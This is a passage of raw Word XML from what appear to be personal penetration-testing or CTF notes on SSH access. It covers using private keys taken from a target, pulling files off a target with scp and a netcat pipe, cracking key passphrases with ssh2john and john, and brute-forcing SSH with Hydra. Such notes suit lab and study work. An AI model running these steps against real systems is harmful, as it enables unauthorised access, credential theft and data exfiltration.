          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, then try this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vim --clean /path/to/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:wq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And this changes the file and makes it cleaner format. This should just add the newline though. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId247">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://unix.stackexchange.com/questions/577402/ssh-error-while-logging-in-using-private-key-loaded-pubkey-invalid-format-and</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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a username, just try logging in via SSH. Sometimes you might not need a password. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if it doesn't work, try Hydra brute force for SSH. Look at the the Hydra section for that</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to log into SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh [username]@[remote_ip]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to troubleshoot for problems, like if private key doesn't work</w:t>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t xml:space="preserve">How to SSH using Private Keys (ex. Private RSA keys):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i /path/to/their_private_key username@target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to move files from SSH to local:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SCP (RUN THIS ON LOCAL MACHINE):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp user@10.10.10.123:/home/user/files/target.zip ~/Downloads/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to run this from your LOCAL MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -r username@&lt;remote_IP&gt;:/path/to/remote/directory /path/to/local/destination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for directories (the -r is the difference)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using netcat (if SCP/SSH is Restricted)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a netcat listener ON LOCAL MACHINE to receive the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 4444 &gt; name_of_file.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send the file using netcat ON TARGET MACHINE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /path/to/target.zip | nc &lt;local-ip&gt; 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to move private keys from target machine to local so that you can use it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">paste private key into it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C12">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This makes it only readable/writable by owner and NO OTHER privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa daniel@10.129.226.199</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says you need a passphrase, then crack it using ssh2john</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john id_rsa&gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Might take a couple of minutes</w:t>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b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at Listening ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to List Listening Ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss: A tool to display detailed socket statistics (replacement for the older netstat).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t: Shows TCP sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l: Filters to display only listening sockets (ports waiting for incoming connections).</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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tln </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if you want all the port numbers since "-n" means don't resolve port numbers to service names (like don't convert 22 to SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C22">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Address:Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0 means that the service is accessible from any IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 means that the service is accessible only from the local machine (which is the machine you are currently SSH into)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C26">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s73cxcoaw9qp" w:id="102"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding SSH version exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
